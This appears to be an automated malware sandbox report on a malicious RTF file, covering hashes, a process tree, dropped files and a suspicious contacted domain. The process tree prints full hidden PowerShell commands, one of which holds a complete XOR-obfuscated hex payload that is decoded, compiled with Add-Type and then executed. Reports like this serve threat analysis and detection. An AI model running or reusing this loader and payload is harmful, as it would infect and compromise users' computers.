File name: | bl.doc |
Full analysis: | https://app.any.run/tasks/eb12ae70-76c8-431f-996a-becfae313e13 |
Verdict: | Malicious activity |
Analysis date: | September 18, 2019, 16:22:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 78688BAE2C3C047F7DCD000B436D470B |
SHA1: | EBA9507AA71BF5B729D8D1034D230E197DF2A155 |
SHA256: | 49EEF2FD867042AE3698CA02A8A9146E087E6C029AEDB607D538ECF3BF882467 |
SSDEEP: | 6144:ssvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvmsvyS:vRRRRRRRRRRRRRRX |
.rtf | | | Rich Text Format (100) |
---|
Author: | Admin |
---|---|
LastModifiedBy: | Admin |
CreateDate: | 2019:01:07 23:54:00 |
ModifyDate: | 2019:01:07 23:54:00 |
RevisionNumber: | 1 |
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 4 |
CharactersWithSpaces: | 4 |
InternalVersionNumber: | 57435 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3008 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\bl.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4092 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3964 | powershell -WindowStyle Hidden function z8231d5 { param($bf6c7) $r8e13 = 'see5e9';$g7f11a7 = ''; for ($i = 0; $i -lt $bf6c7.length; $i+=2) { $qbbf6 = [convert]::ToByte($bf6c7.Substring($i, 2), 16); $g7f11a7 += [char]($qbbf6 -bxor $r8e13[($i / 2) % $r8e13.length]); } return $g7f11a7; } $z6586d5 = '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'; $z6586d52 = z8231d5($z6586d5); Add-Type -TypeDefinition $z6586d52; [g7d96e4]::me815f(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3692 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3932 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\zmtnevhr.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3992 | powershell -WindowStyle Hidden function z8231d5 { param($bf6c7) $r8e13 = 'see5e9';$g7f11a7 = ''; for ($i = 0; $i -lt $bf6c7.length; $i+=2) { $qbbf6 = [convert]::ToByte($bf6c7.Substring($i, 2), 16); $g7f11a7 += [char]($qbbf6 -bxor $r8e13[($i / 2) % $r8e13.length]); } return $g7f11a7; } $z6586d5 = '06160c5b0219201c164100544810165c0b5e53361c46115c1e4b37400b4d1a08001b2c570700175a156a1617135c065c005e10460c571445364c164d16084b710c58140b0a46115010165e4016501d0245661c4a0700081b2c764810165c0b5e53361c46115c1e4b2b5011027e6f154007551a064556095800164552525d4a5300011e623709097c08491c17111d475216170b50090a414749700b4d011c355a0c5707584772004d23170a56245d17170046161b5a384545105b1f0c0615164d12110c56455c0b1100470b193a0b1165114b53020700005b5b2c0b41354d01450006060f16004946114b1a0b02151d0b120607004c02282109592c54030a17414d1b1800175b005540574719457c1d11174c35561a0b1115581951290a5401751a0717541740514c3815154c11090c56454a0704115c0619161d11501757532c0b41354d01451706575a4a074d46114b1a0b02151d0f4b03541c5e623709097c08491c17111d475216170b50090a41474915205707171c650a501d1158173350011110540969010a1150064d514c3815154c11090c56454a0704115c0619161d1150175753070a5a091900545650570a5b2c0b41354d01451201070d4504571930701d1135411719055c06005c1553100c5b1119020401020415530a1041454c1a0b1115005a445603540010483e215909701e150a471111512e00470b5c1f56571b01551f474915205707171c650a501d115817374d1f280a43007416080a471c1b5f453650117512161170174b1c175853045500004c68454a0704115c0619161d1150175753130a5c01191b52045706113a0b1165114b5303575100015f2c0b41354d0145000c570b4a00495c0b4d5313540652085a5e154007551a0645461158070c06150c57074508505d0846034d1c1e701d11354117190154500d56194e451706575a4a074d4f5d0b405401004d1b4257550d540f46065157505d4203550c47105a5e0c534d4b42505d0658043a0b1165114b5d3f00470a1008020a410a1901520401035a445e187c0b4d23111715080c105c5c0104041407505007110154500d5615095d5706545d464d470657094b545300060a45500404570911575201550940500304530844474c1c5e50154d080006004a51040858701d11354117172900175a4c42140a115a454b440
45153060e4818307c0b4d23111715000e1256045301045b302c5b116907174c005e4c1a0b1115020f400053005809480c031d444a4256000756111e50060c5c0d12490002040a1203011955414755495a104d53025306000f464c4c4e0256070a45475258470306025e44311c11503e64530e535153014b581e051d0a4249554d035f5f551d0c5544482c0b41354d01450d07500e44535878044b000d04594b781f090a562d7e1f0a07540911404c5e78044b000d04594b7a1c151c1d0e0f17535d0d49095f0d5700520e4549561c5e51440407564d571612457c0b4d2311171d080c105c5c010417270a2c5b110f474d4c1e5541435554574c151b575002520f5f564c0e170e1251035652035332005726551a000b414541105d0156560b4e0b0042456e160726590c5c1d114d1c5e4a07170c5b02191c015c565c0d4e200b430c4b1c0b08500b4d5d22004123561f0100473558070d4d700b4f1a170a5b085c1d114b66155c100c045923561f0100474b780315095c0658070c0a5b215807044c1e47652f1f5c03565c514e1f0d570a4201501d470c17555504010c43474c0e1d5a4b0106065717370a125b09561201235c095c5b1f5d07560817504d17545b42545404510c46035403505a43535554505b42565157540d43045405500f43015003545d470755035058435d5403545c43005154500143005402540f4201550547105f0a010c0600474c5e65175610001646364d1217117c0b5f1c4508565101465256080b5c044535470a5a16161666115801112c5b03565b0a010c0600474c5e651756100016464b6a070417414d5410515d00520a5a5e1750114c010b45055e44031007590c5a5316115411501045164117501d02454f5d0b405401004d4a07170c5b02190156500d5310081611470c5714450006060f16005817165c1650000c47020011175c0b5e5317560706001158364117501d024b700849071c5e530a4b5b0c0b4145504e555e5c594b40505d034b75160b02410d021a4e58074c42111c1150455e11500057587a1c0b1350174d5d310a771c4d164d17065001454b3640074a07170c5b02111a49571c4908454c5e47560b105c071e5811100d04474c111407505007192d450006060f16003e1d0c16414c4510455c4006535000173f000b5211512e4c5e48175c0710175b454b4057060c07020e18'; $z6586d52 = z8231d5($z6586d5); Add-Type -TypeDefinition $z6586d52; [g7d96e4]::me815f(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1188 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3688 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESB58A.tmp" "c:\Users\admin\AppData\Local\Temp\CSCB589.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3768 | powershell -WindowStyle Hidden function z8231d5 { param($bf6c7) $r8e13 = 'see5e9';$g7f11a7 = ''; for ($i = 0; $i -lt $bf6c7.length; $i+=2) { $qbbf6 = [convert]::ToByte($bf6c7.Substring($i, 2), 16); $g7f11a7 += [char]($qbbf6 -bxor $r8e13[($i / 2) % $r8e13.length]); } return $g7f11a7; } $z6586d5 = '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'; $z6586d52 = z8231d5($z6586d5); Add-Type -TypeDefinition $z6586d52; [g7d96e4]::me815f(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3744 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9F32.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4092 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA8F6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3692 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB069.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3964 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BE9FWJZXLCWDBKERB61G.temp | — | |
MD5:— | SHA256:— | |||
1188 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB4DD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3932 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCB589.tmp | — | |
MD5:— | SHA256:— | |||
3688 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESB58A.tmp | — | |
MD5:— | SHA256:— | |||
3932 | csc.exe | C:\Users\admin\AppData\Local\Temp\zmtnevhr.out | — | |
MD5:— | SHA256:— | |||
3992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SZD4R9OMCPROTEANQLUF.temp | — | |
MD5:— | SHA256:— | |||
3744 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB9FE.tmp.cvr | — | |
MD5:— | SHA256:— |
Domain | IP | Reputation |
---|---|---|
convrgouchon.com | | suspicious |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|